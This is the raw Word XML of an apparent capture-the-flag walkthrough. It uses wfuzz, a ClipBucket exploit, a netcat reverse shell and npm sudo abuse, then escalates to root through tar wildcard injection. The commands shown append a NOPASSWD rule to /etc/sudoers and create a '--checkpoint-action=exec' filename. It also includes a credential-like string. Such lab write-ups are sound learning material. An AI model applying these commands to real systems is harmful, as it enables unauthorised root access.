    <w:p w14:paraId="54358BC4" w14:textId="781CFEE1" w:rsidR="00E552F3" w:rsidRDefault="002230C4">
      <w:r w:rsidRPr="00C712DB">
        <w:t>developers:</w:t>
      </w:r>
      <w:r w:rsidR="008A1172" w:rsidRPr="008A1172">
        <w:t>9972761drmfsls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D4EFEB" w14:textId="6ADB9ED3" w:rsidR="00EF00D5" w:rsidRDefault="007C5715" w:rsidP="00CA3793">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc147658905"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7112792E" wp14:editId="46EF5B9E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3917950" cy="600710"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21235"/>
                <wp:lineTo x="21530" y="21235"/>
                <wp:lineTo x="21530" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15976721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72166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82B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3296660F" wp14:editId="52440BC2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731510" cy="205105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20062"/>
                <wp:lineTo x="21538" y="20062"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="192969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966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0D5">
        <w:t>WFUZZ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="18477815" w14:textId="563C8588" w:rsidR="00EF00D5" w:rsidRDefault="00EF00D5"/>
    <w:p w14:paraId="45BB32C2" w14:textId="77777777" w:rsidR="00852711" w:rsidRDefault="00852711"/>
    <w:p w14:paraId="44480D23" w14:textId="5A68A4C3" w:rsidR="00852711" w:rsidRDefault="000D3AD4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914C83F" wp14:editId="781DA94A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3742857" cy="304762"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20292"/>
                <wp:lineTo x="21439" y="20292"/>
                <wp:lineTo x="21439" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="47481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128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 it to the /etc/hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29302D" w14:textId="77777777" w:rsidR="00FA0EFB" w:rsidRDefault="00FA0EFB"/>
    <w:p w14:paraId="7CE787F4" w14:textId="77777777" w:rsidR="00FA0EFB" w:rsidRDefault="00FA0EFB"/>
    <w:p w14:paraId="3080DF90" w14:textId="373B3485" w:rsidR="00FA0EFB" w:rsidRDefault="00FA0EFB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F53057A" wp14:editId="22E86C57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2857143" cy="333333"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19786"/>
                <wp:lineTo x="21461" y="19786"/>
                <wp:lineTo x="21461" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="196492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216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gin with the credentials cracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54751051" w14:textId="77777777" w:rsidR="00D21621" w:rsidRDefault="00D21621"/>
    <w:p w14:paraId="7105C072" w14:textId="666AEDD2" w:rsidR="00C1059E" w:rsidRDefault="00C1059E" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc147658906"/>
      <w:r>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="54B1E40A" w14:textId="2A48A3A9" w:rsidR="00D21621" w:rsidRDefault="001669F8">
      <w:r>
        <w:t>I was greted with ClipBucket webpage and googled for some exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A6AF9" w14:textId="60FC3E13" w:rsidR="001669F8" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="001669F8" w:rsidRPr="00BA0BCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/44250?ref=infosecarticles.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7110A7FA" w14:textId="1A0A2828" w:rsidR="001669F8" w:rsidRDefault="00477F1B" w:rsidP="00477F1B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc147658907"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7875859D" wp14:editId="4550AAB2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731510" cy="320040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20571"/>
                <wp:lineTo x="21538" y="20571"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="158722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60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714">
        <w:t>Curl 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="2F9EFE3D" w14:textId="1E132EDB" w:rsidR="007307F9" w:rsidRDefault="00AD6765">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6683FFCC" wp14:editId="55185168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4590476" cy="409524"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20124"/>
                <wp:lineTo x="21513" y="20124"/>
                <wp:lineTo x="21513" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="114472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249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44886" w14:textId="09223298" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="16EBAF73" w14:textId="7FFB9E66" w:rsidR="007307F9" w:rsidRDefault="00AD6765">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07D5A970" wp14:editId="52E85FAD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3636010</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2164080" cy="1212850"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21374"/>
                <wp:lineTo x="21486" y="21374"/>
                <wp:lineTo x="21486" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="149411402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1402" name="Picture 1" descr="A computer screen shot of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93A">
        <w:t>Then set up a netcat and click the php file that was created in the index listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09884B96" w14:textId="352E32CB" w:rsidR="00626816" w:rsidRDefault="00E61ADB" w:rsidP="002578F8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc147658908"/>
      <w:r>
        <w:t>Sudo -l</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="24E631C4" w14:textId="61C931D1" w:rsidR="007307F9" w:rsidRDefault="002578F8">
      <w:r>
        <w:t>This showed I could run npm binary as server-management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC09D2" w14:textId="77777777" w:rsidR="002578F8" w:rsidRDefault="002578F8"/>
    <w:p w14:paraId="356EC092" w14:textId="537C7FE3" w:rsidR="007307F9" w:rsidRDefault="00127C92" w:rsidP="00F953D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc147658909"/>
      <w:r>
        <w:t>Upgrade Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="260650FC" w14:textId="0EE4DA46" w:rsidR="00127C92" w:rsidRDefault="007979CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C966FCA" wp14:editId="5DA87AF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523615" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20400"/>
                <wp:lineTo x="21487" y="20400"/>
                <wp:lineTo x="21487" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="154797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787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4928" cy="343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C7A5" w14:textId="6E80465F" w:rsidR="007307F9" w:rsidRDefault="00DC22C6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12624143" wp14:editId="7DDBAAEF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24765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34" y="20842"/>
                <wp:lineTo x="21434" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="81408495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84950" name="Picture 1" descr="A computer screen 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9796" cy="43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44A6" w14:textId="3F6706E5" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5EE1914D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4AAAAD29" w14:textId="521032F1" w:rsidR="007307F9" w:rsidRDefault="00AB24EF" w:rsidP="00AB24EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc147658910"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7571C159" wp14:editId="558B28E2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2254250</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>183515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1200000" cy="361905"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20499"/>
                <wp:lineTo x="21268" y="20499"/>
                <wp:lineTo x="21268" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="127414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455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witching Accounts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="39051ED2" w14:textId="6FB35ED3" w:rsidR="00AB24EF" w:rsidRDefault="00AB24EF">
      <w:r>
        <w:t>I created a file called check.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183A01EC" w14:textId="17B07967" w:rsidR="00AB24EF" w:rsidRDefault="00A73F22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17A82406" wp14:editId="0456DCD3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2061845" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20681"/>
                <wp:lineTo x="21354" y="20681"/>
                <wp:lineTo x="21354" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15020429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42974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EF">
        <w:t>I then created package.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DC1F2" w14:textId="54FA6892" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="05851671" w14:textId="0986E94A" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5E67AD49" w14:textId="083ED263" w:rsidR="007307F9" w:rsidRDefault="00BF243B">
      <w:r>
        <w:t>I then used npm to run package.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C65E8" w14:textId="4990E376" w:rsidR="00B44896" w:rsidRDefault="005A48D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5672F0DF" wp14:editId="34BEA89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390476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52" y="19505"/>
                <wp:lineTo x="21452" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="196355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543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0F782" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4CD93840" w14:textId="7725B095" w:rsidR="007307F9" w:rsidRDefault="00765C2E">
      <w:r>
        <w:t xml:space="preserve">Now I am a different user. </w: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BF432DF" wp14:editId="625080D5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3238095" cy="257143"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21477" y="19248"/>
                <wp:lineTo x="21477" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="208655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43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A3CCC" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="63AFF28D" w14:textId="1978D02E" w:rsidR="007307F9" w:rsidRDefault="00796927" w:rsidP="00FE0EF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc147658911"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Flag 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3E0D6A01" w14:textId="3CA49AFE" w:rsidR="00796927" w:rsidRDefault="00161BCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76DD3044" wp14:editId="11DAD28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123809" cy="361905"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20499"/>
                <wp:lineTo x="21454" y="20499"/>
                <wp:lineTo x="21454" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="94541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132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9D788" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3B2D5922" w14:textId="4502E7F7" w:rsidR="007307F9" w:rsidRDefault="00096AC4" w:rsidP="002C64A9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc147658912"/>
      <w:r>
        <w:t>Flag 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0F0E8428" w14:textId="4284FC41" w:rsidR="00096AC4" w:rsidRDefault="00A2553C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51D99EBE" wp14:editId="02CE1299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4657143" cy="361905"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20499"/>
                <wp:lineTo x="21470" y="20499"/>
                <wp:lineTo x="21470" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6923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18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used a program called pspy64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DDB38F" w14:textId="1EA01B3E" w:rsidR="00A2553C" w:rsidRDefault="007701A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E7AA668" wp14:editId="7F41CA00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731510" cy="438785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20631"/>
                <wp:lineTo x="21538" y="20631"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="201407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740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F9C4D" w14:textId="1312BF3C" w:rsidR="007307F9" w:rsidRDefault="009C1B8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EAB4165" wp14:editId="7F010E76">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>690880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3968750" cy="167640"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19636"/>
                <wp:lineTo x="21462" y="19636"/>
                <wp:lineTo x="21462" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="71203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315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C70">
        <w:t>These are some interesting</w:t>
      </w:r>
      <w:r w:rsidR="005A408B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424692F" w14:textId="4213F7B5" w:rsidR="007307F9" w:rsidRDefault="009C1B8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59B43039" wp14:editId="7D7E715B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301117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54" y="21462"/>
                <wp:lineTo x="21454" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12280453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45322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C413" w14:textId="660D060D" w:rsidR="007307F9" w:rsidRDefault="009C1B8F">
      <w:r>
        <w:t>Under “what to back” the files are taken via a wild card. This gives me an idea of wild card injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107EE7B" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0340ED55" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0C1BC085" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0A649238" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="68961741" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="65927B27" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="623A8E35" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="54BDA552" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3EC52A0A" w14:textId="5735FEEA" w:rsidR="007307F9" w:rsidRDefault="00584D8C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61193">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/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AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00C326C1" w:rsidRPr="00BA0BCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-AU"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77D26686" w14:textId="1B24D71F" w:rsidR="00C326C1" w:rsidRDefault="00C326C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A956C94" wp14:editId="6F1DC355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31510" cy="168910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19489"/>
                <wp:lineTo x="21538" y="19489"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5824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55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is the order of the commands I ran.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519684DF" w14:textId="77777777" w:rsidR="0021079B" w:rsidRPr="0021079B" w:rsidRDefault="0021079B" w:rsidP="0021079B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21079B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>echo 'echo "server-management ALL=(root) NOPASSWD: ALL" &gt;&gt; /etc/sudoers' &gt; demo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907EC42" w14:textId="28FE858E" w:rsidR="00D63D88" w:rsidRPr="00D63D88" w:rsidRDefault="00D63D88" w:rsidP="00D63D88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D63D88">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>touch -- "--checkpoint-action=exec=sh demo.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78585B" w14:textId="47565CC6" w:rsidR="007307F9" w:rsidRPr="00D63D88" w:rsidRDefault="00D63D88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63D88">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60328941" wp14:editId="14EFC3A5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5731510" cy="979170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21012"/>
                <wp:lineTo x="21538" y="21012"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5700843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84309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F2AE7" w14:textId="363C504F" w:rsidR="007307F9" w:rsidRDefault="00D63D88">
      <w:r>
        <w:t>After about 1 minute, you can try ‘sudo su’ and you will have sudo privs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCD7BF" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4A5FCA40" w14:textId="5A7454B8" w:rsidR="007307F9" w:rsidRDefault="00C15B89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3BE2FFF8" wp14:editId="79F87803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322199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55" y="21330"/>
                <wp:lineTo x="21455" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="19710356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35673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0E6E4" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="1BF0598A" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3714A24E" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="6ED6F492" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="67903E99" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="59EBB488" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4E8BA94F" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7C3E79F2" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="41231231" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="6854EB95" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="2561E343" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5016EEC4" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
